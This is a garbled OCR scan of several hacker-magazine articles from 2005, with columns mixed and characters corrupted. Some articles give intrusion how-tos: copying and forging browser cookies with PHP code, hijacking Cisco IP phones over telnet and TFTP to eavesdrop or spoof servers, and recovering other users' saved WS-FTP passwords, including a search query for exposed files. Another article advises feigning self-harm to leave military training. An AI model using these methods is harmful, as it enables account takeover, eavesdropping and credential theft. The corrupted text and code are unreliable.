trict office. I'm not sure if it's been fixed or not laptops usually have Internet access due t o a wifi
connection i n the store.
but I thought that people who are entering i n
Circuit City:
critical information on a computer need t o know Their PCs are open and have a connection t o
where it is going and who has access t o it. the net. The world is yours.
Other places you might find interesting: Shoutz: z3r0, shady, lucas, mayo, and josh.

by Vi leSYN Scookievsl l i e 2 - " 8 ";


$cookievalue3 = "25";
It's 10 pm. Do you know where your cookies
are? I'm going t o go over a few ways that cookies setrawcookie ( "password ",$cook
can be exploited, and why it's not a good idea t o Wievalue, time()+3600, "/", ".fake.com",
keep them i n your browser. I E keeps the cookies 0);
i n "\Documents and Settings\O/~UseP/o\Local setrawcookie( "lastvisit ",$cook
Settings\Temporary Internet Files", with the file
name starting with "Cookie:". Mozilla on the
"'"'
~fe~~:~~&,,t3:~
setrawcookie( "userid", $cook
other hand saves the "cookies.txt" file i n ~ i e v a l u e 3 , time()+3600, "/",
- /.mozilla/default/<random>.slt, and Firefox ".fake-com", 0);
?'
stores it i n "/.mozilla/firefox/default.s2e/. Last,
safari keeps itsu ~ o o ~file es in p ~ i sHere
. -/Li t ~ you set three cookies, "password",
sbrary/Cookies/. "Lastvisit", and "userid". Each cookie i s assigned a
that we know where they are, the ques- value, an expiration date, a path, a domain, and
tionis what to do with them. Any of the cookie a boolean secure integer. There i s one trick t o
files can be copied and used with the same type this though. If YOU t r y this code as it is, it w i l l not
of browser on a different machine, With the set the cookies. If the browser does not see that
snarfed cookies, you can Log into the domains the server resolves t o the domain, it fails. Of
that hold cookies and see what data is encapsu- course, there are ways around this. You simply
lated inside. edit your "hosts" file, and add a Line like this:
Other ways t o capture cookies include using 127.0.0.1 fake.com
Cain & Abelfrom oxid.it on Windows systems. An- When you navigate t o fake.com/cookie.php,
other i s t o sniff packets. Using tcpdump or any you will resolve t o yourself, and the cookies will
other sniffing utility, monitoring the H l l P port set themselves. With the "." i n front of the do-
it's going through and using an unlimited main, a l l hosts are effected by this cookie. You
snaplen can show some interesting results. What can then navigate t o the original web server (i.e.,
you are looking for is this: www.fake.com) and it will recognize the cookie
as being there. I f the values came from a legiti-
Set-Cookie: cookiename=cookievalue; ex mate source, then the server will see the cookies
,pires=expiredate; path=directorypath;
domain=domainname.com as being just as legitimate as long as the expira-
YOU can then take that information and tion has not been reached. So that's it. Happy
forge your own cookies with a PUP file ~narfing!
like this:
<?php
Thanx to FBSDHN, SE, and Dale "The Sandgog-
Scookievalue = " I "; gle" Texas.
ZbDD t l a g a z i n e l
by Kong share the same channels for upstream and down-
I was recently hired as a field-network techni- stream. To cut down on lost voice packets, they
cian at a major cable company. Idon't want t o are given priority over data packets. This could
name names, but Iwill drop a hint and let you cause some performance drops while surfing but
know that they own AOL, CNN, and several other they are hardly noticeable. The RJ-11 jack on the
big names. The title of my j o b really means noth- MTA acts the same as a jack t h a t i s hooked up t o
ing. Ijust go t o customers' homes or businesses telco wiring, meaning it supplies -48 volts DC for
and set up wireless and wired networks. Interest- on-hook and 90 volts AC for ringing and a l l t h a t
i n g stuff but nothing too interesting. Idid this good stuff. It also supports d u a l tone multi fre-
for a month or so until Iwas given an opportu- quency (DTMF). The MTA also has t h e j o b o f
nity t o switch over t o the Voice over I P (VoIP) de- changing the analog voice signal i n t o digital
partment. Being an avid phone phreak Idecided packets. Once the MTA has transferred t h e pack-
t o take this opportunity. After an intense train- ets, it sends them through t h e coaxial cable i n
i n g session, Iwas left with a little more knowl- your neighborhood t o t h e CMTS.
edge then Ihad before and a training manual. The CMTS i s also the same as w i t h a standard
Since selling the manual on eBay seemed out o f cable modem. It is located at a cable company of-
the question, Idecided the best place t o share fice and terminates the packets f r o m t h e coaxial
my new information would be i n an article. cable t o either fiber optics or Ethernet. For Inter-
The first misconception many people have net, it routes t h e packets from t h e i r office t o t h e
with VoIP i s that your phone calls go over the I n - Internet. I n the case of phone, it keeps the pack-
ternet. While this is true with Vonage and other ets on a managed network controlled by t h e cable
Internet phone companies, it is far from the truth company and used for VoIP only. Packets are
with the phone system Iwork on. The VoIP sys- routed t o different parts of t h e network depend-
tem consists of the following: i n g on who is calling whom. Eventually they are
MTA: Media terminal adapter - cable modem. dropped o f f a t the MGC.
Coaxial Network: Coaxial cable is television Once the packets arrive a t t h e MGC they are
cable, enough said. further analyzed t o decide where they are going
CMTS: Cable modem termination system, more one last time. The job of the MGC i s t o send and
on this later. receive packets t o and from t h e PSTN. So basi-
MGC: Media Gateway Controller, see above cally a l l the cable company has t o do i s get the
notes. packets from your house t o their office and then
PSTN: Public switched telephone network, drop them o f f at the telco and l e t them deal with
telco's existing network. it from there.
The MTA works on the same basic principals as This article i s a condensed version o f a 500
a standard DOCSIS (Data Over Cable Services I n - page manual but Ihave included t h e most impor-
terface Specification) cable modem. It even uses t a n t parts. There are a few minor details Ihave
the same channelin the RF spectrum. It can even l e f t out such as various servers t h a t do nothing
look the same as a standard cable modem except more than make sure your phone i s on the hook
i n addition t o an RJ-45 jack and US6 port, it will or o f f the hook, let people know your number i s
also have an RJ-11 jack for a phone. This means disconnected, etc. A good section o f t h e training
i n almost a l l cases Internet and phone are run manual also deals with how t o hook t h e MTA up
from the same device and the same coaxial cable. t o the customer's exiting phone wiring so they
Both functions have their own MAC address and can use a phone i n every room instead of just
also their own I P address. Most cable modems plugging a phone i n t o t h e MTA. That section i s
have a buffer of 1500 bytes which will last about not that interesting and most people with any
10 seconds and will cause some noticeable delays phone experience professional o r n o t shouldn't
on streaming video or music as packets are loss. have t o worry too hard about that. The main idea
Since delays for voice are unacceptable, the o f this article was t o outline h o w and why t h e
phone part of the modem only has a buffer of 160 system works. Keep i n mind t h a t once the pack-
bytes or about 20 milliseconds. This means t h a t if ets leave the MTA they are standard I P data pack-
a packet is lost for voice, there i s no chance of it ets and can be sniffed like a n y other packet
being resent. As mentioned earlier data and voice regardless o f medium (coax, Ethernet or fiber).
\Spring 1?005 page 35'
by Moby Disk surprised t o find that Cisco didn't even put one
This article pertains t o the Cisco 7940 and b i t of thought into security. It is trivial t o do a l l
7960 I P phones. For those new t o IP phones, they of these things and more. Let's see how.
function like normal office phones on a PBX but Required Tools
they run over Ethernet. This makes them highly All you need t o execute the basic hacks is ac-
hackable. The Cisco phones have a monochrome cess t o the network that the phones reside on. I f
pixel-addressable LCD display. They communicate your computers are on the same switch as the
via 10/100 Ethernet at f u l l or half duplex. The phones, you can just use your desktop PC. Other-
firmware i s updateable and Cisco provides wise, obtain a hub. A plain Windows 2000 work-
firmware t o support several voice protocols. station includes the necessary Telnet and TFTP
Power can be provided via AC or via unused wires client. Some of the more advanced tricks require
on the Ethernet cable. The phones communicate a TFTP server. I f you do not have physical access
with a call manager server that handles configu- t o the phones themselves, you will need a sniffer
ration, mailboxes, etc. The phones support a t o determine the IP addresses and names of the
wide variety of protocols. This article will use the phones.
main configuration protocols including Dynamic Security
Host Configuration Protocol (DHCP), Trivial File The Cisco phones Iused provide no security
Transfer Protocol (TFTP), and Telnet. Other sup- whatsoever. Every employee necessarily has
ported protocols used include DNS, SNTP, and physical network access. A wireless router would
ICMP. Real-Time Transport Protocol (RTP) i s used allow anyone t o remotely control your phones
for audio (Cisco 3). Various protocols including without physically being i n the office. I n this
SIP, MGCP, and SCCP are used for signaling other particular office, the phones were actually acces-
phones. H l l P is supported for downloading sible from outside the office! Once Ihad the IP
graphics t o display on the LCD. addresses, Iwas able t o telnet t o the phone on
my desk from my home PC.
Newer versions of the Cisco Call Manager soft-
ware require digital signatures t o make it more
difficult t o spoof firmware updates and also sup-
ports IPSEC. I f you do use an I P phone system, I
strongly recommend using the latest software
and enabling IPSEC. You should also configure
the phones t o disable Telnet access. This can be
subverted by spoofing the TFTP server and send-
i n g fake configuration files, but that i s much
more difficult.
Hacking
So what exactly can be done remotely with
these phones? You can do anything available via
1 the menus or buttons physically on the phone.
I Looked into these phones first out of hacker Remotely change phone settings
curiosity: This is a great example of digital con- Change the ring tones (predefined tones or use
vergence. Iwas amazed that these phones were your own)
actually computers and that Icould communicate Modify the firmware
with them using my desktop PC. Ialso wanted t o Change the logo on the display
know how secure they were. Could someone lis- Redirect the company directory or the voice mail
ten i n t o calls? Fake calls? Make the phones ran- Remotely control phones
domly yell insults at coworkers? Well, I was Initiate calls (with speakerphone)
L
h a k e the phone ring Next, use a TFTP client t o retrieve t h e files \
Adjust the volume "RingList.datU, "SIPDefault.cnf', and "SIPxxxxxx
Take phone on/off the hook ~ x x x x x x . c n f ' where t h e x's represent t h e host
Crash the phone name of the phone. Replace SIP with SCCP or
Without IPSEC, you should be able t o eaves- MGCP if your server uses one o f these protocols
drop on phone calk with a packet sniffer. I n the- (Cisco 1). The configuration f i l e s are plain text
ory, you could redirect phone calk or change files containing the server settings, phone num-
voice mail settings, but these are truly malicious bers, telnet Level, and an unencrypted password.
activities and Idid not research how t o do this. Settings are the default configuration file and
These actions would require I P spoofing which i s may be overridden i n each phone's configuration
beyond the scope of this article. file.
HOW-TO This password also allows y o u t o change con-
Start with physical access t o the phones and figuration settings via the phone's menus by se-
assume each phone i s password protected. Get lecting the "Unlock Configuration" option i n the
the I P address, host name, and TFTP server for configuration menu. You may also telnet t o the
each phone by pressing the configuration button phone using the I P address and password. From
(the one with the picture of the check box) and here, you can execute many commands. A f u l l list
selecting Network Configuration. The host name of commands i s available a t (Cisco 2).
w i l l be something like 000CAED39328. I f you do The test key command i s t h e most fun. Press-
not have physical access t o the phone, then you i n g thevolume buttons causes t h e phone t o ring.
w i l l need t o sniff for this information. You can change settings such as ringtones by
The main configuration menu simulating the navigation keys. I t i s possible t o
pick up the speakerphone and dial, then connect
t o the destination phone and i n s t r u c t it t o pick
UP.
Changing Ring Tones a n d O t h e r Settings
You can select any of t h e standard ring tones
using the phone or via telnet. Ringlist.dat con-
,* , tains the description and f i l e name for each ring
-
-- tone. You can download the r i n g tone files via
L-iV

;4 4.-:
. .
7

TFTP, but you cannot upload n e w ones t o the


r2-i,-,-
tts- ( 7 ~ : server. The ring tone files are 8 kHz 8-bit u-law
audio files <=2 seconds long (Cisco 3).

Close the telnet session.


est open Enter hacbng mode.
est close Emt hacking mode.
The network configuration screen showing
t h e DHCP sewer. MAC address. and host name.
volup: Volume up
Notice t h e "lockn icon i n next t o t h e title, indi-
headset: Headset
cating t h a t we cannot change t h e settings yet. spkr: Toggle speakerphone
mute: Mute
info: Info
msgs: Messages
sew: Services
dir: Directories
set: Settings
navup: Navigate up
navdn: Navigate down

test string Stn'ng can be any number o f 0..9, #, and *.


This allows you t o control t h e menus and t o dial
test onhook Place the phone on or off hook, as though someone
test offhook picked it up. Can be used t o answer calls. Improper
use of this can cause the phone t o confuse on and
off hook (picking up the receiver can become the
on hook state, and vice-versa)
test ? Ask the phone what keys it supports. This is useful
test help i f your phone has additional navigation "soft" keys.

<Spring ZOO5 Page 1 7 1


7
/ Using the existing ring tones i s neat, but phones ship with IPSEC. For now, have fun by
making your own i s very cool. Since you cannot listening i n on meetings and making your
upload files t o the TFTP server, t o use your own coworkers' phones taunt them.
ring tones you need t o set up your own TFTP References
server and direct the phone t o use it. I n the (1) Information on the bootup process and
phone's configuration screen i s a setting "Alter- the files residing on the server: "Converting a
nate TFTP." Set this t o yes. Then change the "TFTP Cisco 7940/7960 CallManager Phone t o a SIP
Server" setting t o contain the I P address of your Phone...", Cisco Systems 1992-2004; http://www
server. Now you can serve up your own firmware, ~.cisco.com/warp/public/788/voip/handset~to
ring tones, and configuration files. Serving your e-sip.html
own configuration file allows you t o change the (2) Telnet commands, monitoring options,
URL for the logo on the display, the URL for the and troubleshooting tips: "Monitoring Cisco SIP
corporate directory, and the phone number for I P Phones (Versions 6.x and 7.x)", Cisco Systems
the voice mail. Logo files must be 8-bit BMP files
1992-2004; http://www.cisco.com/en/US/prod
even though the LCD is black-and-white (VOIP 4).
*ucts/sw/voicesw/ps2156/products_administra
It looks like the corporate directory browser
~tion~guide~chapter09186a00801d1988. html
works like a minimal text-only web browser.
I n this particular office, the phones did not (3) Physical phone setup, ring tones: "Getting
have working DHCP so the H l l P server for the Started with Your Cisco SIP IP Phone (Version
logo had t o be a single-homed H l l P server t h a t 1.0)", Cisco Systems 1992-2004; http://www.
was accessible by IP. ~cisco.com/en/US/products/sw/voicesw/ps215
Conclusions r6/products-administration-guide-chapter091
I P phones are gaining i n popularity since they ~86a0080087511.html
are becoming versatile, powerful, and easy t o in- (4) Logos, messages, directories, ring tones,
stall. Pricewise, they are competing very effec- general information, and Links: "Configuring
tively against existing PBX systems. Expect t o see Cisco 79xx phones with Asterisk", Arte Marketing
rapid growth i n the future. However, expect t o 2004; http://www.voip-info.org/wiki-Asterisk%
see more stringent security i n place now that the ~20phone0/~20cisco0/02079xx

by H2007 password we are attempting t o view.


This file i s intended t o show you how t o view a Step 3) Sure, you can simply connect with the
password saved i n WS-FTP.ini using WSFTP itself. password i n i t s masked form like it currently is.
Tools needed: WS-FTP - any version. However our agenda here is t o decrypt it so we
Step 1) Copy the user's WS-FTP.ini file stored can view the password itself. Why? To know a
i n \..\..\WS-FTP\. Take a copy of the WS-FTP.ini valid password that the user uses.
file and place it i n your \wS-FTP\ directory. I n the UID area, copy and remove the user ID
Step 2) Open the file i n any text editor of your (in this case "h2007") and replace that with
choosing. Here is a short example of what you "anonymous". So UID=h2007 should now read
will see. UID=anonymous.
[ WS-FTP321
Step 4) The fourth and final step i s very sim-
HOST=ftp.randomftpserv.cOm
ple. Execute WS-FTP95.exe, click Connect and se-
UID=h2007
lect the appropriate profile name. Voila, you now
DIR= "/pub/win32 "
have an unmasked valid password, user name,
PASVMODE=l
TIMEOFFSET=O
and host. I n this case our password is
PWD=V9D8F029E316E1B1C2B2D1B173817B8936B3
"2600rocks!"
B6A39A6A6A277AESB Many schools and businesses use this soft-
TYPE=6010 ware. It is not hard t o find several valid user
The text i n brackets [WS_FTP32] is the profile names and passwords just by gaining access t o a
name set by the user. Selecting that is how you user's \WS-FTP\ directory. You can also google
will display the information i n WSFTP. HOST i s of "intitle:index.of ws-ftp.iniW and you will find
course the host address. UID is the valid user several results.
(name we will be using. PWD i s the "encrypted" Happy Hacking!
by RSG tcpdurnp i s Ethereal. Mac people should also
Packet sniffers are incredible learning tools. check out EtherPEG which reassembles JPEGs or
Like many people, I have a wireless Internet GIFs i n real time as they flow by.
router installed i n my apartment. It creates a Okay, Ihad my leech trapped. But what could
small, wireless Local Area Network (LAN) which ILearn? First, Inoticed a Media Access Control
provides connectivity for my three computers. (MAC) address i n t h e tcpdump output. These are
The other day Iwas tooling around on my unique hardware addresses assigned t o network
LAN, using my trusty packet sniffer t o learn more adaptors. With a MAC address y o u can look up the
about how my router works and how the various vendor of the machine. I plugged t h e MAC ad-
computers interact on the network. All o f a sud- dress into http://www.coffer.corn/mac~find and
den Inoticed a f i f t h I P address was sending and made a note o f my Leech's computer type. After
receiving data. Five? But Ionly own three com- sifting through a few more pages of tcpdump
puters and a router. Bingo, Ihad a wifi leech. output, I learned the make a n d model of my
Wifi leeches are fairly common these days. It's leech's computer as well as t h e t y p e and version
a very common practice t o jump on an open wifi number of the operating system, plus t h e make
node when you see one available. 2600 has even and model o f my leech's printer. Hmmm, should I
provided information on more than one occasion send over a print job?
on how t o detect wireless nodes (for example, You'll get a l o t o f uninteresting garbage, but
see the cover design for the Summer 2002 issue). here are a few strings t h a t are helpful t o grep
I've always thought, perhaps somewhat naively, through the tcpdump output with: @, GET, OK,
that open wireless was better then closed and USER, <html>. You'll no doubt discover your own
thus had never blocked access t o my router using
favorite strings t o grep on.
a password or MAC address filtering. But this time
After a day or two, Ihad discovered a whole
it was personal. Iwas curious. Who was this
l o t about my leech: his name, t h e names o f his
leech?
two email providers, the names o f t h e email lists
First a disclaimer: I'm not a professional
he was subscribed t o (google t h e "SurvivePX"
sysadmin, nor am Ia low-level protocol ninja.
email list for a giggle), t h e names and email
But I've managed t o teach myself a thing or two
addresses of his friends ....You g e t t h e picture.
about how networks work. This article is meant t o
be introductory. Comments and additions are en- So here i s the dilemma: if someone i s stealing
couraged. your bandwidth, i s it okay t o spy on them? I ' m
Ihad t o move quickly. Itoggled back t o the afraid the ethical answer i s probably no. But still,
terminal where my favorite packet sniffer, tcp- if Icould read his email, then h e could read mine
dump, was running. Tcpdump is ubiquitous. If (if he had half a brain). I n effect, Iwas reminded
you run a *nix operating system you most likely of the importance of security a n d privacy: use en-
already have it installed. (Windoze people can cryption, and if you keep your node open (as I
use a port called "WinDump.") Since Iwanted t o opted t o do), be conscious o f how people are
ignore a l l traffic except for the data going using your network at a l l times.
to/from my leech, Irestarted tcpdump using the My Leech prompted me t o learn a l o t about
"host" argument and my leech's I P address: how data moves around a LAN a n d what sort o f
/usr/sbin/tcpdump -SO -i en1 -Aa host information is revealed about a user. Ihope this
W192.168.1.103 was useful t o you. For more information on net-
Irun Mac OSX, so the "-i e n l " flag means sniff work protocols Iwould recommend W. Richard
on my en1 internet adaptor, i.e., my airport card. Stevens' book TCP/IP Illustrated, Volume 1 (Addi-
The "-Aa" and "-so" flags are the juicy parts. They son Wesley) and Eric Hall's Internet Core Proto-
t e l l tcpdump t o suck down the f u l l packets i n hu- cols (O'Reilly); For t h e technical specs o f I P and
man-readable ASCII text. Fun! Check the man TCP you should also be sure t o read RFC 791 and
( pages; your mileage may vary. A nice alternate t o RFC 793. Happy leech hunting.
vbv Josh D
Let me just say h g h t out that some of the
.u
don't want t o attemDt t o set uo vour own WAP
gateway, you can jukt use the brier public WAP
ideas described i n this article may not be per- gateway provided by http://www.waptunnel.com
fectly legal - this article is meant t o be educa- at 207.232.99.109:9200 or 207.232.99.109:9201.
tional and if you attempt t o execute any of the The only reason Irecommend setting up your own
ideas presented here, Iwill take absolutely no re- WAP gateway i s because Waptunnel's tends t o not
sponsibility for extra cellular charges you may in- work very well most of the time (although you
cur or for any trouble you may get into with your can find other public gateways if you Look around
cellular provider. on Google). For now, let's just assume you have
What i s WAP? acquired an I P and a port of an active WAP gate-
WAP is an acronym that stands for Wireless way. The next problem is just getting a l l of this
Access Protocol, which i s (on a very basic level) information into your cell phone.
the technology that a cellular phone uses t o con- My main areas of expertise include cell
nect t o the Internet. There are several WAP phones made by LG and Kyocera, so I ' l l briefly de-
browsers and the one t h a t w i l l be described today scribe how t o get into the service menu of cell
is called Openwave, which comes preinstalled on phones made by those respective companies. On
a bunch of cell phones. I have personally seen the newer LG phones with color screens, when
Openwave i n use on LG and Kyocera phones, but you h i t the menu button from the home screen
I'm sure these aren't the only phone brands that you'll notice there are nine menu choices from 1-
use Openwave. 9. Ever wondered why they didn't start at zero?
Openwave is generally not that hard t o tweak. Try hitting the zero button. You'll be asked t o en-
Once the browser is running on a cell phone, one ter i n a six-digit service code, which is usually a l l
just has t o press and hold down the zero button zeros. Now you're i n the service menu of the
(or menu button depending on the phone manu- phone, and Iwouldn't touch anything you don't
facturer) on their phone until they are greeted feel confident i n messing around with, because
with a menu full of everyday browser features, it's pretty easy t o render a phone unusable by en-
such as "Reload" and "Bookmarks." The last item tering i n incorrect settings. You'll want t o select
on the menu is "Advanced", which i s where the "WAP Setting" from the service menu and then "IP
configuration of your WAP setup w i l l eventually Sem'ng". Select "Link3-IP1". Write down what you
end. I f you're following along on your own cell see on a piece of paper i n case something goes
phone and you're seeing what I'm describing, you wrong (so that you can "reset" the phone t o its
most likely have a cell phone manufactured by LG default settings if you need to) and then replace
or Kyocera and your cell phone company (if you the listed IP with the I P of your WAP gateway
live i n the US) is probably Verizon. (don't enter the port). Hit OK and then h i t CLR.
You'll notice that i n the "Advanced" menu, Select "Port Setting" from the menu, then select
there is an option called "Set WAP Proxy". Keep Link3-Portl, then again write down what you see,
this function i n mind. A WAP Proxy i s just an I P then enter i n the port of your WAP gateway. Hit
and a port that point t o what's called a WAP gate- OK and then END. Ihave tested this method with
way, a program running on a computer that acts LG VX4400 and VX6000 cellphones but it will work
as a gateway (hence the name) allowing a cell for other LG phones, although accessing the ser-
phone t o connect t o the wireless Internet. It's vice menu might be a little different - you might
fairly easy t o set up your own gateway, using your have t o press menu and zero at the same time, or
own computer's Internet connection. I use a press and hold menu and then press zero, or vice
gateway called WAP3GX, available at http://www versa.
r.wap3gx.com. On the other hand, if you have a Kyocera
A detailed explanation of configuration of a phone go t o the home screen and enter i n the
WAP gateway is beyond the scope of this article, number 111-111like you were going t o call that
but just know that the gateway (at least this i s number. You'll see a menu option pop up on the
true for WAP3GX) listens on UDP ports 9200 and bottom of the phone. Scroll until you see a menu
9201 and that you'll need t o configure your item called "Options", select it, and find another
router and/or firewall accordingly t o forward menu item called "Browser Setup". This is basi-
,these ports t o your computer. I f you're too lazy or cally the same as the LG setup from here, except
G s t e a d of "Links", there are "Uplinks", and there WAP, however. I f you use Cerulean Studio's mulb-
.\
are only two of them. Change the information i n network chat program, Trillian Pro (available at
Uplink B t o that of your WAP gateway. http://www.trillian.cc/), you can download a
The service menu i s the trickiest part of this plug-in for Trillian called I.M. Everywhere, which
operation, and if you're having trouble entering i s available a t http://www.iknow.ca/imevery-
seth'ngs or if you find my instructions inadequate where/. This program i s a miniature HTTP server
or have a phone manufactured by a company (not a WAP gateway) t h a t w i l l l e t you I M anyone
other than LG or Kyocera, there i s plenty of infor- that i s on your Trillian buddy list from your
mation about a l l this on the Internet phone. Trillian supports ICQ, AIM, MSN Messen-
(http://www.howardforums.com i s a good place ger, and Yahoo Messenger, which means t h a t you
t o start.) - j u s t search for "WAP". will be able t o I M a l l of your buddies on your
The hardest part i s now out o f the way. Try re- phone without paying for text messages. I.M.
opening your WAP web browser and change the Everywhere broadcasts i n both WML and HTML so
active WAP Proxy (as described i n the beginning you would enter your own I P i n t o t h e default
of this article) t o Proxy 3 if you have an LG Phone home page prompt on your phone t o get this
or Proxy B if you have a Kyocera phone. I f you see working, or you could enter your I P i n t o any I n -
a page asking you t o enable security features, it ternet browser on a computer a n d use I.M. Every-
means t h a t you haven't properly configured the where t o controlTrillian remotely.
browser t o conned t o your WAP gateway - you're One very important thing t o n o t e i s t h a t WAP
still connecting t o your cellular provider's gate- requires cellular airtime. You w i l l be charged, i n
way. I f everything went according t o plan, the minutes of time spent on the wireless web, for
phone should connect t o your gateway and data transfer on your phone bill. There i s no extra
prompt for a default home page t o display. Note charge for wireless Internet (like there normally
that most o f the WAP-enabled phones only can would be), only regular airtime "talking" minutes
browse through and display WML (Wireless (at least with Verizon), which means t h a t you w i l l
Markup Language) pages as opposed t o HTML most likely have free WAP nights and weekends -
pages, so you'll need t o go hunting for WML instead of seeing a dialed number on your phone
pages. Google's wireless WML page is located at bill, you would just see "DATA TRANSFER". Your
http://wap.google.com, which is nifty for find- cellular provider will almost definitely not sup-
ing other WML sites. Wireless Mapquest i s located port doing what is outlined here - so i f you're go-
at http://wireless.mapquest.com/aolmq_wml, i n g t o t r y any of this on your own, t r y it with
and wireless Superpages i s located a t http://wap caution. Again, Itake absolutely no responsibil-
~.superpages.com/cgi/cj_client.cgi, t o name a i t y for extra cellular charges you may incur or for
few sites. All of these Links would be entered into any trouble you may get i n t o w i t h your cellular
your cell phone a t the prompt. provider if and when you t r y a l l o f this. That said,
Browsing isn't the only thing you can do with have fun and Ihope you learned something!

by Bac yourself from what could possibly happen.


This article i n no way supports using these I n fact, everyone who leaves within the first
methods and is only written for informative pur- 180 days of service is granted an "entry level sep-
poses. I f you sign up, you should stick it out like a aration," be it for good reason, b a d reason, or ugly
good sedceperson. reason. So the scare tactics they use t o keep you
These observations were done when Iwas exit- i n Line are i n fact not quite as valid as stated. (You
ing the USAF during my Basic Military Training know the good ole UCMJ.) That does not fully ap-
segment. From what Ican t e l l the system is set up ply until after your first 180 days o f training.
t o bounce back people who are questionable once Most of the way the exit process works is very
they enter into the service. compartmentalized. Each person a t a desk knows
So you are going into the military. Be sure t o little t o nothing about the other links - from the
have long talks with your recruiter, ask lots of people i n your, own wing, t o the BAS, t o the pro-
questions, and make sure you can quote question- cessing folk, t o the docs and other assorted peo-
able remarks or what may be blatant Lies verbatim. ple. Some are enlisted, some are civilians, and
That is the first thing you can do t o protect some are officers. Not one person has all the
7
G w e r s . All of this Ihad t o learn from experience group of recruits and speed up the exit process is
with all the various people involved i n this t o claim self harm or a desire t o harm others, Ho-
process. mosexuality has t o be attempted i n practice, not
The intent of all the processes is t o deter peo- statement, i n order t o get removed from basic.
ple from leaving. The military is having major is- Also, i f you harm others I know nothing of the
sues with retention so every effort is made t o process that they would use t o isolate you, but I
return recruits t o training. presume they would keep you heavily medicated.
Also, some of the information that Ireceived is 7. Your medical history that you suppressed at
rumor. Here is my attempt t o separate fact from MEPS (Military Entry Processing Station) will prob-
fiction on the subject of exiting. ably come back t o haunt you i f you t r y t o use that
1.Your recruiter cannot lie t o a superior i n re- t o Leave. Simply put, the blame will be placed
gards t o direct questioning about a statement. upon you and your pay will be revoked, or they will
2. The service will do whatever it can t o stick say you are claiming false diseases and return you
you with the bill and not pay you, such as if you t o training.
come clean about a medical history issue, even if 8. This one is quite surprising. Going AWOL
your recruiter told you t o lie (this is where being (absent without leave) from BMT may only get you
able t o quote questionable remarks verbatim is an orange vest if you return willingly, along with a
important). They will most likely stick you with the required service of 40 days with the rest of the re-
bill and send you home with some of your gear, jects, and forfeiture of pay. But you still get an
and may i n fact charge you. "Entry Level Separation."
3. They will send you back t o your point of en- 9. I f you use illegal drugs, even i f you pass the
try or your home of record. test at MEPS, they will test you for traces and kick
4. They will spend about two weeks processing you out when they have the results back, even i f
your file i n regards t o exit. Once you try t o Leave you are a week from graduation from basic.
it's not all easy. It is still military protocol and 10. You can exit cleanly if you keep your ears
even if you have a complete breakdown, it's no open and realize that the system is not as stacked
walk i n the park. They may lock you up i n the men- against you as you might think, and that the exit
t a l ward at the hospital. routine is easy t o access.
5. I f you try and get hurt or don't drink enough This is entirely for informative purposes only.
water (heatstroke), they will just send you t o get It's intended for use i n case the draft is rein-
patched up and returned t o training. stated, or if you really make a major mistake by
6. The easiest way t o get isolated from your joining.

I mhkbuster's Compass - ' ?+ ! \

by Aristotle at the same pace as someone who has never seen


As of March lst, 2005, every Blockbuster em- a keyboard. While this does ensure that every
ployee will have spent hours reviewing the new employee has been presented with a l l the rele-
software corporate uses for payroll management: vant information, mind-numbing i n i t s redun-
Compass. Created by Bluecube, the expansive dancy, it also ensures a l l but the most simple of
software package also includes training modules employees will ignore what they are supposed t o
t o help "streamline" future employee promotions. read, feeling their very I Q being drained by the
At its core, the Compass training system i s a system's tediousness.
series o f web-based PDF files and interactive Once the system goes live, it will schedule
Flash media. Employees click through the se- employees according t o need, as judged by Com-
lected tasks or read the required documents, and pass. I n the test run this week, many "full-time"
take a brief quiz when they have completed a employees found they, had fewer than fifteen
module. Tasks include learning how t o entering scheduled hours i n the coming work week, while
your payroll corporate ID and password t o clock lower-paid part-time employees were given an
i n and out, making schedule requests, and view- excess. Unqualified personnel were scheduled t o
ing their assigned work week. Sadly, there i s no run store-wide inventories, and almost every in-
I way t o skip ahead, so anyone who has used any dividual I've spoken t o found they had been
menu-driven software before is required t o move scheduled during times at which they were un-
\
Gailable. These problems may be resolved by porate each time) t o accomplish many mundane
launch, but it i s uncertain. tasks has already decreased productivity, two
Another aspect of the Compass system is i t s weeks prior t o the software's f u l l implementa-
ability t o be remotely monitored. Four times a tion.
shift the Manager-on-Duty (MOD) i s required t o 1, t h e big blue, ever strivingto
update the daily task list with what employees make the workplace more inhospitable and un-
had accomplished what, and at what time. At any bearable for employees, have continued t o as-
point i n the day, the district and regional direc- tound and confuse their workers with each
torate, and likely others higher On the additional bureaucratic layer they place beheen
chain, can see any store's updated task list. The
US a" Our customers. The meager
threat of constant surveillance isintended t o be
a Upowerful motivator," claimed one store man- paychecks they dangle before us d o little t o
ager during a meeting. assuage the knowledge t h a t we a r e i n fact part of
addition to disallowing employees from this machine. Iknow Ihave made my decision,
clocking outfrom their shifts at any time, a viola- and I'd Like t o thank Bluecube Software for assur-
tion of many states' labor laws, the numerous i n g me it was the right one.
checks and balances put i n t o place requiring a Related Links: www.blockbuster.com,
manager override (with a handy alert sent t o cor- www.bluecube.com

7
, , I

't
,
.'L
d
, , C.P--'
by Chess ' < E T A N&%RBOT~" CONTENT=,~NOINDEX,
"Just when I thought that I was out they pull , b ~ o ~ ~ ~ ~ ~ " >
me back in!" Learn t o stay out of Google. AlternaYively, you can allow every search en-
Most people are dying t o get their sites listed gine except for Google t o index Your Page. Just
i n Google. But what if you want your site out of add this tag:
Google's listings? Maybe you want t o keep your <META NAME= "GOOGLEBOT" C O N T E N T = " N O I N D E X ,
site private, or you don't want a bunch of creeps b N O F O L L O W r ' >
surfing t o your page trying t o find animal porn. This next tag will remove t h e "snippets" from
Maybe you just hate Google, are paranoid, or the Google results it returns. Snippets are the de-
have some copyrighted material on your page scriptive text underneath t h e URL when you p u l l
that you need out o f Google's cache today. What- up a list of Google results. It has your search
ever the case, it's actually pretty easy t o get out terms bolded within the snippet t o show you
of Google and start t o bask i n relative anonymity. what context your terms are being used in.
Because once you're out, then your page is off <META NAME= "GOOGLEBOT" C O N T E N T = " N O S N I P
the Internet for a l l intents and purposes. Having b P E T " >
your page delisted i n Google is almost Like having If you want your page t o b e listed i n Google
1 your page password protected where the pass- but don't want them t o store a n archive of your
word i s your URL! (In this article, I alternate be- page, then add only this next t a g t o your header:
tween keeping Google's bots out of your page and CMETA NAME="ROBOTS" CONTENT="NOARCHIVE"~
keeping a l l search engine bots (there are other This i s handy if you have a page t h a t changes
search engines now?) out. I'm assuming that if frequently, i s time critical, or ifyou don't want
you want out of Google you want out o f them all. searchers t o be able t o see y o u r old pages. For
I f you really only want out of Google then use example, if you're a professor posting test solu-
"Googlebot" instead o f "Robots" i n the following tions or something similar you'd definitely want
examples.) t o remove Google's cache if y o u plan on reusing
The first thing you want t o do is add some the test.
